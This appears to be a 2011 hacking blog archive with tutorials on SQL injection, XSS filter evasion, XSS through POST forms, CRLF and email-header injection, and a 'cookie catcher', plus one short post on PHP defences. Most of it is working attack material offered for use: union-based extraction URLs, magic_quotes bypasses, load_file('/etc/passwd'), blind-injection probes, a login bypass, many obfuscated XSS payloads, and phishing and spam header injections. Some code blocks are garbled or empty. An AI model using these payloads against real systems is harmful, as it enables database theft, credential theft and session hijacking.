Showing posts with label web security. Show all posts
Showing posts with label web security. Show all posts

Saturday, September 10, 2011

The Complete Guide to SQL Injections

?

What is SQL Injection

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.

0x00 - Intro

All the information contained in the article is from personal experience, if I don't go over something that you currently do or have seen in SQL injections, its because I do not use it; not saying I'm right just that's how it is. As you should already know, extracting database information from a server without administration approval is illegal and I cannot be held accountable for any malicious actions executed after reading this acticle.

0x01 - What is MySQL

"SQL" stands for "Structed Query Language," which simply allows users to send queries to the server database. There are different types of SQL such as MSSQL, which is Microsoft's version of the language and also has some different commands as well as syntax.

0x02 - Finding SQL Injections

Before jumping into this topic I want to explain to you about comments in MySQL. There are three variations to a comment in this language:

--
/*
#

As you should already know a comment just blocks out a section so it will not be executed through the query. Typically, anytime you see a page from a website that takes in a paramater such as:

?id=
?category_id=
?user_id=

(not saying injections are narrowed down to only id parameters but they are quite common) you may want to test the page for a vulnerability. The simplest way I know of to check for a vulnerability is to add:

" and 1=1--

to the end of the url and see if the contents of the page change, even the slightest bit, if they don't then add

" and 1=0--

(it doesnt have to be 1=1 or 1=0 just something that returns true for the first statement and false for the second) and see if it changes after the second. If the contents change after the second query then you have a vulnerability.

0x03 - Gathering Information

To make your job or life a little easier you should look around the site some to gather information on what you are trying to retreive. For instance, if the site has a user registration look at the source code for the page and take note of the field names they use (most developers are lazy and use the same names for simplicity); you can also look around the site for more vulnerabilities. Alright so once you have found some good information to look forward to, its time to find out how many columns are being selected from the database from the original query. This is an important step because if number of columns you "select" and the number from the original are not identical, the injection does not work! To find out the number of column you simply add "order by x" on the end of your vulnerable url replacing "x" with a increasing number until you get an error

http://www.site.com/vulnerable.php?id=4 order by 9--

the number of columns being selected is the value of x before the error.

0x04 - The Injection

I suppose this is where some people get confused. In MySQL in order to combine two query statements you can use the keyword "union", you can also include the keyword "all" which will dislay all results (default property of union is to remove duplicate results from display). After your "union all" you also need to inlcude the keyword "select" since we are going to want to select database information and display it on the screen so far you should be looking at something similar to:

http://www.site.com/vulnerable.php?id=4 union all select

Continueing the injection like the previous example will work fine, but it will also display all the original results as well as our new results, typically to bypass this I, as well as most of the other people exploiting sql injections, relace the id value, in the case of our example it would be 4, with one of the following:

-1
null

or any result that would not be in the database, this way the original select query will not result anything but our new injected select query will display. In SQL each column being selected must be seperated by a comma(,) so if your vulnerable site is selecting 4 columns with the original statement (which was found earlier when we were gathering information using the "order by") you would just concatinate those on your injection; I like to set each column to a different numeric value that way i can keep track of which columns are actually being displayed on the screen. So far, if everything has been going ok, you should have an injection url looking something like:

http://www.site.com/vulnerable.php?id=-1 union all select 1,2,3,4--

If not then go back and keep reading it until you figure it out. The last part of our injection setup is the telling the query which table to "select" the information from; we do this with the keyword "from table"...pretty self explanitory right? So for example, we have a vulnerable site that has 4 columns being selected and we want to look at the "users" table we can have a set up such as:

http://www.site.com/vulnerable.php?id=-1 union all select 1,2,3,4 from users--

Easy enough so far, now is where it gets a little more difficult, but not too much.

0x05 - Tables and Columns

Depending on the version of MySQL the administrators are running on the server, finding table and column names can be very easy or somewhat irritating. There is an easy way to figure out what version is running on the server, can you guess? If you did not guess version(), why the hell not, its like one of the easiest and self explanitory things ever! Anyways, replace one of the columns in your injection that displays on the screen with the function call version() and this will tell you which typically its either 4.x.x or 5.x.x. If they are running some form of version 4 then you're basically on your own when it comes to figuring out table and column names (i'll post some examples of common names later); though if version 5 is implemented then your life is easy. As of version 5.1 of MySQL the developers began to automatically include a master database on the server called INFORMATION_SCHEMA. Within information_schema there are tables that give information about all the tables, columns, users, etc on the entire sql server (to find more about the structure of information_schema and the table/column names visit http://dev.mysql.com/doc/refman/5.0/en/information-schema.html). Once you figure out a table name and some column names within that table you want to look at just place them into our injection setup from before; suppose we have a site that has a "users" table and columns "user" and "pass" and the second and third columns are displayed onto the screen, we could view these by an injection such as:

http://www.site.com/vulnerable.php?id=-1 union all select 1,user, pass, 4 from users--

This example will display both the user and pass onto the screen in the given positions, though what happens if only one column is selected or displayed? In MySQL there is function called concat() which simply concatinates fields together so to simplify our privious example we could have:

http://www.site.com/vulnerable.php?id=-1 union all select 1, concat(user,0x3a, pass), 3, 4 from users--

"0x3A" is just a colon(:) in hexidecimal, simply to seperate the two fields for my own viewing.

0x06 - Narrowing down the Selection

Typically when performing a SQL injection there are multiple results you want to look at or possibly just one individual. There are a couple of ways to narrow down your selection first way is to use the "where" keyword is just takes a logical parameter such as "where id=1" which would look in the id column in the table and find which row is equal to 1. The next way to to use the "limit" keyword; this way is a little more useful since you do not need to know an additional column name to increment through the selections limit takes two parameters, where to start the selection and how many to select. So in order to select only the very first "user" from the table "users" using the "limit" keyword you could have:

http://www.site.com/vulnerable.php?id=-1 union all select user from users limit 0,1--

to look at the rest of the users individually you just increment the 0 up until you get an error. In order to look at all the results in a single swipe you can use the function group_concat() which works very similarly to concat() except it displays all the results for the given column(s) seperated by a comma(,) (the comma is just the default, you can change it by using the "separator" keyword and indicate a symbol to use).

0x07 - Obstacles

Excluding the fact that version 4 in general is an obstacle, there are a few different things web developers can do to try and make sql injections a little more difficult. The most common of these annoyances would be magic_quotes; basically magic quotes disallows any type of quotation marks and breaks it by adding a back-slash(\), which of course is going to mess up your injection. To get around this there is the nice little function char(); char() takes ascii values and generates the corresponding character value, thus eliminating the need for a quote. Example time...say we want to look at the "pass" column FROM the table "users" but only WHERE the "user" column is only equal to "admin" and the site only selects one column from the original query, easy enough right? we learned this earlier

http://www.site.com/vulnerable.php?id=-1 union all select pass from users where user="admin"--

curve ball! the developers have enabled magic_quotes therefore your "admin" will not work properly...i know its sad. To fix it we simply take the ascii values of each character (http://crashoverron.t35.com/ascii.php) so now we get

http://www.site.com/vulnerable.php?id=-1 union all select pass from users where user=char(97,100,109,105,110)--

TA-DA! injection fixed. Also another safety feature they try to block us with is regular expressions to search our input, but often times they have their expressions set to such narrow possibilities that you can bypass them by simply changing the case, the comment symbol, or replacing spaces with "+" (SQL is not case sensitive, it also sees "+" as a space filler much like a space).

0x08 - Additional opportunities

Although I said before version 4 was a pain in the ass, I have also noticed a nice feature common to version 4 vulnerable sites I have come across in my adventures; this feature would be the function load_file(), not saying the function is exclusive to version 4 but from my experience it is most commonly enabled for current users by developers for some reason in this version. load_file() acts just as file_get_contents() from PHP in that it returns the contents of the file into a string format. If enabled this allows for more than just SQL styles hacks on the server, it now allows for LFI vulnerabilities as well. Although, load_file() needs to have the exact full path to the file you are trying to open, for example: /home/CrashOverron/Desktop/file, and if input as a literal string then it must be encased in quotes, which brings back the issue of magic_quotes but as before just use the char() function. The next interesting feature that is hardly ever possible, but I have seen happen, is the use of the "INTO OUTFILE" keywords. This is the exact opposite of load_file(), in order to use either of these features the current user that MySQL is running as must have the FILE privilege on the server. Again, the full path is needed for the output file, which cannot be an existing file, though unlike load_file() the char() function does not fix magic_quotes. Time for an example of both, here is the situation: vulnerable site has 1 column selected also has a "users" table. load_file no magic_quotes:

http://www.site.com/vulnerable.php?id=-1 union all select load_file('/etc/passwd')--

load_file with magic_quotes:

http://www.site.com/vulnerable.php?id=-1 union all select load_file(char(47,101,116,99,47,112,97,115,115,119,100))--

INTO OUTFILE:

http://www.site.com/vulnerable.php?id=-1 union all select "test" INTO OUTFILE "/etc/test" from users--


0x09 - Blind SQL Injection

Blind SQL injection occurs when the original select query obtains column information but does not display it onto the screen. In order to continue through a blind sql injection you must basically brute-force any value you want to know. There are a few functions we can use in conjuction with each other that make this quite easy yet tedious, those would be the mid() and the ascii() functions. mid() is MySQL's substring function and ascii() does the exact opposite of char() it takes a character and exchanges it with the corresponding ascii numeric value. Doing this allows us to determine the range each of our desired value is in on the ascii chart, thus narrowing each down until we find a match. Example situation; we have found a site that is vulnerable to blind sql injection and we want to figure out which user MySQL is currently running as, our injection sequence could look something like:

http://www.site.com/vulnerable.php?id=1 and ascii(mid(user(),1,1)) < 97--

(this will tell us if the first letter in the user is above/below "a" then we can change the 97 to a different value until we find the character to the first letter)

http://www.site.com/vulnerable.php?id=1 and ascii(mid(user(),2,1)) < 97--

(just repeat as before and keep incrementing through the letters and you will eventually have the current user)

0x10 - Login Bypass

Ok, I left this for towards the end because it is not really very common anymore but I will through it in because I suppose you may run across it some day (I have only ran across this vulnerability once in real world). The concept behind the SQL login bypass is quite simple; in order to execute the exploit you input a username into the user field then in the password field of the form you put:

' or 1=1--

this just ends the current password field and includes the logical OR with a constant true statement. A simple MySQL login script could look like:
<?php $user = $_POST['user']; $pass = $_POST['pass']; $ref = $_SERVER['HTTP_REFERER']; if((!$user) or (!$pass)) { header("Location:$ref"); exit(); } $conn = @mysql_connect("localhost", "root", "blah") or die("Could not connect"); $rs = @mysql_select_db("db", $conn) or die("db error"); $sql = "SELECT * FROM users WHERE user=\"$user\" AND pass=\"$pass\""; $rs = mysql_query($sql, $conn) or die("query error"); $num = mysql_numrows($rs); if($num != 0) { echo("Welcome $user"); } else { header("Location:$ref"); exit(); } ?>


so if we input the user "admin" and "" or 1=1--" as the password the query sent to the server is going to look like this:


"SELECT * FROM users WHERE user="admin" AND pass="" or 1=1--"

so the server is going to select row where the "user" equals "admin" and disregard if the "pass" is correct because it is asking if the pass OR 1=1 are true, since 1=1 is always true you bypass the pass section.

0x11 - Useful Keywords/Functions


UNION ALL SELECT AND/OR ORDER BY WHERE LIMIT LIKE INTO OUTFILE char() ascii() mid() concat() group_concat() load_file() user() database() version()

Keep Rocking, Keep Hacking

Posted by alphajatin 0 comments
Labels:

The Complete Guide to XSS

?

What is Cross Site Scripting?

Cross-site scripting (XSS)is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. Cross-site scripting holes in general can be seen as vulnerabilities which allow attackers to bypass security mechanisms. By finding clever ways of injecting malicious scripts into web pages an attacker can gain elevated access privileges to sensitive page content, session cookies, and a variety of other objects.

There are three distinct types of XSS vulnerabilities:
non-persistent
persistent
and DOM-based (which can be either persistent or non-persistent).

Non-persistent cross-site scripting hole is also referred to as a reflected vulnerability, and is by far the most common type. These holes show up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user. A classic example of this is in site search engines: if one searches for a string which includes some HTML special characters, often the search string will be redisplayed on the result page to indicate what was searched for, or will at least include the search terms in the text box for easier editing. If any occurrence of the search terms is not HTML entity encoded, an XSS hole will result.

Persistent XSS vulnerability is also referred to as a stored or second-order vulnerability, and it allows the most powerful kinds of attacks. A type 2 XSS vulnerability exists when data provided to a web application by a user is first stored persistently on the server (in a database, file system, or other location), and later displayed to users in a web page without being encoded using HTML entities. A classic example of this is with online message boards, where users are allowed to post.

DOM-based XSS vulnerability, also referred to as local cross-site scripting, is based on the standard object model for representing HTML or XML called the Document Object Model or DOM for short. With DOM-based cross-site scripting vulnerabilities, the problem exists within a page's client-side script itself. For instance, if a piece of JavaScript accesses a URL request parameter and uses this information to write some HTML to its own page, and this information is not encoded using HTML entities, an XSS hole will likely be present, since this written data will be re-interpreted by browsers as HTML which could include additional client-side scripts.

Finding XSS Vulnerabilities

The most common used XSS injection test is:

<script>alert("XSS")</script>

When this example is injected into an input box or a URL parameter, it will either fire or it will fail. If the injection fails, it doesn't mean the site is secure, it just means you need to look deeper.

XSS Filter Evasion


Escaping From Strings

The first step is to view source on the Web page and see if you can find the injected string in the HTML.There are several places you may find it completely intact, yet hidden from the casual observer.The first is within an input parameter:

<INPUT type="text" value='<SCRIPT>alert("XSS")</SCRIPT>'>

In this example we could alter our input to include two characters that allow the injected code to jump out of the single quotes:

'><SCRIPT>alert("XSS")</SCRIPT>

Now our code renders because we have ended the input encapsulation and HTML tag before our vector, which allows it to fire. However, in this case, the extraneous single quote and closed angle bracket are displayed on the Web page.This can be suppressed if we update our vector into the following:

'><SCRIPT>alert("XSS")</SCRIPT><xss a='

This turns the code output into:

<INPUT type="text" value=''><SCRIPT>alert("XSS")</SCRIPT><xss a=''>

As a result, the JavaScript code is injected with no visible indication of its existence.The <xss a=''> tag does not render, because it is not valid.

Working Around Filtered Quotes

Let's use the same example above, but assume the Webmaster included code to put slashes in front of any single quotes or double quotes (i.e., add_slashes()). Our previous vector without the last part would now turn into:

<INPUT type="text" value='\'><SCRIPT>alert(\"XSS\")</SCRIPT>'>

There are several methods to try and work around this it all depends on the filtering in place. One method is to use Character Entities. Some characters are reserved in HTML. For example, you cannot use the greater than or less than signs within your text because the browser could mistake them for markup. If we want the browser to actually display these characters we must insert character entities in the HTML source.

&#34; &quot; " quotation mark, apl quote
&#38; &amp; & ampersand
&#60; &lt; < less-than sign
&#62; &gt; > greater-than sign

Using the code (&quot;) or (&#34;) in place of our quotes is one method to try and work around quote filtering. Example:

<script>alert("XSS")</script>
<script>alert(&quot;XSS&quot;)</script>
<script>alert(&#38;XSS&#38;)</script>

If no quotes of any kind are allowed you can use fromCharCode in JavaScript to create any XSS code you need. The fromCharCode() takes the specified Unicode values and returns a string. Example:

<script>alert("XSS")</script>
<script>alert(String.fromCharCode(88,83,83))</script>
<INPUT type="text" value='\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'>

You can use the For MySql char(ASCII,ASCII,...): calculator bellow to translate your code into CharCode.

Working Around <SCRIPT> Filtering

Some filters will filter out <script> making it impossible for any of the above examples to work. However, there are many other ways to insert JavaScript into a Web page. Let's look at an example of an event handler:

<BODY onload="alert('XSS')">

The "onload" keyword inside HTML represents an event handler. It doesn't work with all HTML tags, but it is particularly effective inside BODY tags.That said, there are instances where this approach will fail, such as when the BODY onload event handler is previously overloaded higher on the page before your vector shows up. Another useful example is the onerror handler:

<IMG SRC="" onerror="alert('XSS')">

Because the image is poorly defined, the onerror event handler fires causing the JavaScript inside it to render, all without ever calling a <script> tag.

Using IMG SRC

The two most commonly permitted HTML tags are <A HREF, which is used for embedded links, and <IMG, which is used to embedded images. Of these two, the most dangerous is the IMG tag. The follow illustrates some examples of why this tag is problematic:

<IMG SRC="nojavascript...alert('XSS');">

No quotes and no semicolon:

<IMG SRC=nojavascript...alert('XSS')>

Filtering quotes and script:


<IMG SRC=nojavascript...alert(&quot;XSS&quot;)>

Using CharCode to work around filtering quotes:

<IMG SRC=nojavascript...alert(String.fromCharCode(88,83,83))>

A simple attack vector, like the one above, can be even further obfuscated by transforming the entire string into the decimal equivalent of the ASCII characters:

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101; &#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

Using the ASCII table you can decipher this example, and then use the same method of obfuscation to create your own injectable string. The same can be done for hexadecimal:

<IMG SRC=&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;& #x65;&#x72;&#x74;&#x28;&#x27;&#x58;&#x53;&#x53;&#x27;&#x29;>

While the javascript: directive syntax inside images has been depreciated since IE 7.0, it still works in IE 6.0, Opera 9.0, Netscape 8.0 (when in the IE rendering engine, although it has also been depreciated as of 8.1)

Using Tab, New Line, and Carriage Return

Tab, new line and carriage return characters can also be used to trick XSS filters.

<IMG SRC="jav&#x9ascript:alert('XSS');">

The example above uses a tab Minimum Sized Decimal to break up the word javascript intern breaking up the XSS and tricking the filter. The output above will look as follows:

<IMG SRC="jav
ascript:alert('XSS');">


Horizontal Tab New line Carriage Return
URL %09 %10 %13
Minimal Sized Hex &#x9 &#xA &#xD
Maximum Sized Hex &#x0000009; &#x000000A; &#x000000D;
Minimum Sized Decimal &#9 &#10 &#13
Maximum Sized Decimal &#x0000009; &#x0000009; &#0000009;


Using Null character

Another character that can cause problems for filters is the null character. This is one of the most obscure and powerful tools in any XSS arsenal. Take this example URL that can lead to a valid injection:

<SCRIPT>alert("XSS")</SCRIPT>

The null character () stops the filters from recognizing the <SCRIPT> tag. This only works in IE 6.0, IE 7.0, and Netscape 8.0 in IE rendering engine mode.

Not filtering inside encapsulating pairs

Bypassing filtering that looks for open and closing pairs of encapsulation inside HTML tags and ignore the contents. Example:

<IMG """><SCRIPT>alert('XSS')</SCRIPT>">

Technically, inside the IMG tag, the first two quotes should be considered encapsulation and should do nothing.The next quote should allow encapsulation and go to the next quote which is after the </SCRIPT> tag. Lastly, it should be closed by the trailing end angle bracket. But all major browsers, such as, IE, Firefox, Netscape, or Opera take this as malformed HTML and attempt to fix it. The output then looks like:

<img><script>alert('xss')</script>"&gt;


CSS Filter Evasion

HTML is a useful tool for injecting JavaScript, but not the only tool an even more complex sub-class of HTML is the style sheet or CSS. There are many different ways to inject XSS into style sheets, and even more ways to use them to inject JavaScript. . The simplest way to inject JavaScript into a CSS link tag is using the JavaScript directive.

<LINK REL="stylesheet" HREF="nojavascript...alert('XSS');">

However, IE has depreciated this as of 7.0, and it no longer works, you can still get it working in Opera and users who may still have IE 6.0 installed. Another way is to use the <STYLE> tag. It is rare that users have access to modify styles but it does happen. This is more common in cases of forums where users have access to the layout and design on their post. The following will work in IE and Netscape in the IE rendering engine mode: <STYLE> a { width: expression(alert('XSS')) } </STYLE> <A> Using the above as an example, you can see how the expression tag allows the attacker to inject JavaScript without using the JavaScript directive or the <SCRIPT> tag.

<DIV STYLE="width: expression(alert('XSS'));">


Obscure Filters

Let's take an example where a developer has taken user input and insured that it contains no quotes, no angle brackets, and no JavaScript directives. Still, it is not safe, as we can inject something called a data directive in this case, we have base64 encoded the simple string <script>alert('XSS')</script>.

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

The data directive allows us to inject entire documents inside a single string. The data directive works inside Firefox, Netscape in Gecko rendering engine mode, and Opera.

Using Double Quotes

If you need to use both double and single quotes you can use a grave accent to encapsulate the JavaScript string - this is also useful because lots of cross site scripting filters don't know about grave accents.

<IMG SRC=`nojavascript...alert("Look its, 'XSS'")`>


Escaping characters

Escaping quotes is sometimes usefull when there is an own written protection against XSS. This will allow you to escape the escape characters used by the XSS filter script.
It's worth mentioning that this will ONLY work if it's an own written (weak) defending script.

<IMG SRC=`nojavascript...alert(\"XSS\")`>

The result would be:

<IMG SRC=`nojavascript...alert(\\"XSS\\")`>

As you can see your own escape characters now filter out the escape characters used by the XSS protection.

Encoding

It is often assumed that if all angle brackets and quotes have been filtered that XSS is no longer possible. However XSS is reliant upon the browser, so as long as the browser can understand other encoding methods, you can run into situations where a browser will run commands without any of those characters.
A real world example of an XSS encoded vulnerability was found in Google search appliance by a hacker named Maluc. Maluc found that a normal Google search appliance query looked like:


http://ask.stanford.edu/search?output=xml_no_dtd&client=stanford&pro">http://ask.stanford.edu/search?output=xml_no_dtd&client=stanford&pro xystylesheet=stanford&site=stanfordit&oe=UTF-8&q=hi

He noticed that according to this string (oe=UTF-8) he could change the UTF code. He changed the UTF string from UTF-8 to UTF-7.
UTF-7 (7-bit Unicode Transformation Format) is a variable-length character encoding that was proposed for representing Unicode-encoded text using a stream of ASCII characters, for example for use in Internet e-mail messages. UTF-7 is generally not used as a native representation within applications as it is very awkward to process despite its size advantage over the combination of UTF-8 with either quoted-printable or base64.
Lets take for example:


<script>alert("XSS")</script>

And encode it using UTF-7:


+ADw-script+AD4-alert(+ACI-XSS+ACI-)+ADw-/script+AD4-

Now all + have to be changed to URL code in a GET strings for this to work. So the URL code for + is %2B now we have:


%2BADw-script%2BAD4-alert%281%29%2BADw-/script%2BAD4-

URL encoding is turning a string into a safe block of text for appending on the query string of a URL.To encode characters to append to a URL, you use a percentage symbol, followed by the two-digit hex number representing that character.
For example:


Original character Character Entity Reference
space %20
/ (forward slash) %2F
" (double quote) %22
? (question mark) %3F
+ %2B

With this Maluc came up with:


http://ask.stanford.edu/search?output=xml_no_dtd&client=stanford&pro">http://ask.stanford.edu/search?output=xml_no_dtd&client=stanford&pro xystylesheet=stanford&site=stanfordit&oe=UTF-7&q=%2BADw-script%2BAD4-alert%281%29%2BADw-/script%2BAD4-x

And was able to successfully execute an XSS script.
Of course the effect of the XSS is only temporary and only affects the user who go to that URL, but this could easily provide an avenue for phishing. In this way, Google appliance has hurt Stanford University's security by being placed on the same domain.

Keep Rocking, Keep Hacking

Posted by alphajatin 0 comments
Labels:

XSS and post method

?
XSS and post methods When a webpage uses the GET method to submit user inputs through a form, XSS is easily executed, by constructing a url for example like http://www.xssvulnsite.com/index.asp?q=">alert("XSS"). But when a webpage uses the POST method it is not possible to craft such an url, using it as a link, because the page doesnt use the url to send the user inputs to the form. Although it is still possible to achieve XSS vulnerability exploitation. So lets suppose one more time vulnerable site http://www.xssvulnsite.com/ using a form to search or submit data. Very synoptic html code:
Code


To exploit XSS vulnerability we can use an indirect way. So another file will be written and then loaded to another page, lets say the file hack.html and the page http://www.redirectingpage.com/hack.html What are its contents? In the hack.html file the following code will be written
Code
setTimeout(formX.submit(),1);

We can see that we are using the parameters of the original form to the form of the redirecting, a hidden form and in value a script, wanted to be executed, a photo, text, whatever we like to use in XSS hole. Follows a script that when opens the middle page loads the XSSed vulnerable page after 1msec.

Keep Rocking, Keep Hacking

Posted by alphajatin 0 comments
Labels:

Saving the World, One Vulnerability at a Time

?
x00 - Intro
Hey there, I was going to make a video going over this information but when I got around to it, it seemed like a boring subject to watch. Anyways I wanted to go over a few different techniques to help prevent some of the more common web vulnerabilities that are seen; such as: Cross-Site Scripting, Full Path Discplosure, Local/Remote File Inclusion, SQL Injection, Cross-Site Request Forgery. Each of the techniques I plan to cover are geared towards securing PHP source code, so if you code in Perl, ColdFusion, ASP, or some other web language this probably isn't going to help much.

0x01 - Cross-Site Scripting (XSS)
Hopefully you already know about XSS and how the attacks work. As of PHP version 4.x.x there was a feature called "magic_quotes_gpc"; though magic_quotes was actually made to prevent SQL vulnerabilities it also helps with XSS because this feature adds slashes (\) anytime a quotation (") is present in either the GET, POST, or COOKIE fields hence the "gpc." Although magic_quotes is a nice feature to have as of PHP version 5.3.0 it is now considered deprecated, and actually as of 6.0.0 its removed completely, so as a web developer we need a new method of adding slashes. We can do this with a function called...you guessed it addslashes() so what these features would do if an attacker used alert("test"); the output generated would be alert(\"test\"); though this is easy to get around with the javascript function fromCharCode(). A possibilities to help this vulnerability is regular expressions such as preg_match or preg_replace. Another simple form of XSS comes into play when the developers use the PHP_SELF variable; which is vulnerable by default. Developers could make a script such as

Code

   echo(\"You have viewing: \" . $_SERVER['PHP_SELF']);
?>



and the attacker would simply append "/" onto end of the url for example:

http://site/index.php/alert("test");

A solution to this problem is a function called basename(). basename() is set to what ever text is placed after the final forward slash (/) which in our attackers case would be "script>" so now even though our script is still not functioning properly it is no longer vulnerable to the attack. Another important function to keep in mind is the htmlspecialchars(), this function converts characters into their html entities for instance < becomes <

0x02 - Full Path Discolsure (FPD)
Full path discolsures happen when error reporting is enabled for web applications and there is actually a pretty easy fix for it. In the php.ini file there is an option for "display_errors" which as of PHP 5.2.4 has three possibilities: on, off, stderr. STDERR displays errors for applications other than web, so stderr and off are both safe. Another way to set this option is the PHP function ini_set() which could look like ini_set("display_errors",0).

0x03 - Remote File Inclusion (RFI)
In order to fix the RFI vulnerability you can simply turn off the allow_url_include option in the php.ini file much like we did with the FPD. Although once the allow_url_include is off LFI comes into play and needs to be avoided.

0x04 - Local File Inlusion (LFI)
Local file inclusion vulnerabilities can be performed with functions such as but not limited to:
include()
include_once()
require()
require_once()
virtual()
readfile()
fread()
fgets()
file_get_contents()
highlight_file()

There are a few simple techniques to patch a LFI vulnerabiltiy, setting open_basedir either at runtime with ini_set() or in the php.ini or httpd.conf files, you could also use a switch statment or if/elseif statement. open_basedir is not completely safe though; when using this method the script is restricted when using other files to the give path. Although, if the path is incorrectly set an attacker would still be able to possibly perform the LFI attack on our files. There are a few somewhat complex ways of bypassing SAFE_MODE/open_basedir; although by the time an attacker can attempt these it will already be too late for you because they are on the inside already. Example: lets say as the developer we issue open_basedir to only allow access to our website's root folder "/home/oursite/www/public_html/". This will restrict an attack so they will not be able to inject php code in our access/error log files or use /proc/self/environ and include a shell from our script, it will also restrict the attacker from viewing any other sites hosted on the server if any are present. This does not however protect the files within our website such as a config.php which could include our sql server information.

Vulnerable code could look like:
Code

   inlcude(\"./\" . $_GET['file']);
?>



it can easily be fixed

open_basedir:
Code

   // open_basedir restricts the php script from accessing file and directories outside of the given scope
   ini_set(\"open_basedir\", \"/home/oursite/www/public_html/\");
   include(\"./\" . $_GET['file']);
?>



Switch:
Code

   switch($_GET['file'])
   {
      case \"index.php\":
         include(\"./index.php\");
         break;
      .
      .
      .
   }
}




if/elseif:
Code

   $file = $_GET['file'];
   if($file == \"index.php\")
   {
      include(\"./index.php\");
   }
   elseif($file == \"users.php\")
   {
      include(\"./users.php\");
   }
   else
   {
      include(\"error.php\");
   }
?>



As you can see the open_basedir solution is easier but creating a whitelist using a switch or if statements as more effective. You could also use regular expressions to check for directory transversal, but this can typically be bypassed fairly easily which is why its not given as a solution.

0x05 - SQL Injection
As said during the XSS section, magic_quotes_gpc was created to help prevent sql attacks as well as the addslashes() function. Another function geared towards protecting the site's database is mysql_real_escape_string(). mysql_real_escape_string escapes special characters such as \x00,\n,\r,\,'," and \x1a; so the developer could create a query that is vulnerable:
Code

$id = $_GET['id'];
$query = \"SELECT * FROM products WHERE id = $id\";



this can be secured with the previous function
Code

$id = mysql_real_escape_string($_GET['id']);



If your user input variable is suppose to only be a number, like the previous example, you could also use is_numeric() which obviously checks whether the variable is a number.
Code

$id = $_GET['id'];
if(is_numeric($id))
{
   $query = \"SELECT * FROM products WHERE id = $id\";
}



0x06 - Cross-Site Request Forgery (CSRF)

Keep Rocking, Keep Hacking

Posted by alphajatin 0 comments
Labels:

CRLF Injections

?
----------------------------------------
[0x] Table of Contents
----------------------------------------

[1x] - What is a CRLF Injection?
[2a] - Vulnerability PoC - Comment System
[2b] - Vulnerability PoC - Email Form
[2c] - Vulnerability PoC - Header Injection
[3x] - Patching
[4x] - References
[5x] - Conclusion

----------------------------------------
[1x] What is a CRLF Injection?
----------------------------------------

Carraige Return Line Feed (CRLF) work due to improper sanatization in user input. The carriage
return is essentially the same as hitting 'Enter' or 'Return', creating a new line. The
carriage return can be represented in a few different ways: CR, ASCII 13 or r. Both the carraige
return and the line feed do essentially the same thing. Although, the line feed is represented as
LF, ASCII 10 or n. These commands are printer commands, the line feed tells the printer to feed
out one line and a carriage return said the printer carriage should go to the beginning of the current
line. In the event you know the operating system of the target machine it will prove useful to know
that Windows uses CR/LF but *nix systems only use LF.


----------------------------------------
[2a] Vulnerability PoC - Comment System
----------------------------------------

To illustrate the first method of CRLF we will be using a hypothetical comment application which is
vulnerable to the attack. Let's say our current comment system looks like so:


8/04/07 - DaveSomething is wrong with the login system?
09/04/07 - haZedYeah, you should fix it....


Keep in mind both of these posts are legitimate. To exploit the vulnerability our attack will craft
a post that will make it seem like he's posting as an administrator. He will enter the following in
to the comment box:


Yep, doesn't work..n10/04/07/ - Admin I've relocated the login to http://attackersite.com/login.php,
you should be able to login there.


This extremelly simple injection will change the comment output the following result.


8/04/07 - DaveSomething is wrong with the login system?
09/04/07 - haZedYeah, you should fix it....
09/04/07 - EthernetYep, doesn't work..
10/04/07 - Admin I've relocated the login to http://attackersite.com/login.php


As you can clearly see in the example, by posing as an administrator we are able to phish passwords
from the unsuspecting users. By inserting our new line character in to the post we can go down a line
and pretend to be an administrator. It's a pretty neat trick.

----------------------------------------
[2b] Vulnerability PoC - Email Form
----------------------------------------

The second and final example involves a script used to send emails to other users. The catch is that
you cannot see the real email address of the person you are sending to. To exploit this we can simple
insert the following in to the 'Subject' header:


Hey, it's DavenBcc: dave@email.com


This injection will send the email over to dave@email.com AND the person we originally specified in the
'To' column. These mail forms can also be exploited by spammers in order to hide their identity. By
using a similar method as above they can'Cc' and 'Bcc' the message to 100's of other people spamming their
inboxes anonymously.

----------------------------------------
[2c] Vulnerability PoC - Header Injection
----------------------------------------

As an alternative to inserting the carriage returnline feed in to an input box we can also use a program like
Achilles to intercept the POST headers and then modify them. Using a similar example as to the Email Form
example above we could change our headers like so:


Content-Type: application/x-www-form-urlencoded
Content-Length: 147

name=This+is+a+test+&emai l=dave@coldmail.com&subje ct=Test&header=Header:
noone@thingy.com
CC:fbi.gov@meow.com
Bcc:enigmagroup.test.@eg. com,
psychomarine@enigmagroup. org,
ausome1@enigmagroup.org
&msg=crlf!


As you can plainly see in the above example we are able to modify the header in order to spam those email
addresses.

----------------------------------------
[3x] Patching
----------------------------------------

The CRLF vulnerability is extremely easy to patch. The following code example assumes the input is set to
$_POST['input'].


if (eregi('n', $_POST['input'])) //This checks for the new line character in the POST variable
{ //start if..
die("CRLF Attack Detected"); //exit program if CRLF is found in the variable
} //end if..


I have commented the code so that you can gain an idea of how we are fixing this vulnerability. As you can see
it doesn't take much to thwart this vulnerability. Sadly, not many people are implementing such a patch.

----------------------------------------
[4x] References
----------------------------------------

http://ca.php.net/manual/en/function.eregi.php - PHP Eregi function used in patch
http://en.wikipedia.org/wiki/CRLF - General CRLF information
http://www.owasp.org/index.php/CRLF_Injection - OWASP CRLF stub article

Keep Rocking, Keep Hacking

Posted by alphajatin 0 comments
Labels:

Cookie Catcher

?
This article will teach you how to make a cookie catcher.

What is a cookie?

A cookie is a special thing used store information on a web browser such as user logins, passwords, etc.

What is a cookie catcher?

A cookie catcher is a php script which captures a browser's cookies.

Is making a cookie catcher hard?

Not at all. The hard part is getting someone to click on a link which contains the cookie catcher.

Creating The Cookie Catcher:

Now we are going to get down to the cookie catcher.

First you need a webserver that supports php.

Now that you have that we can begin.

Here is the cookie catcher:

Code

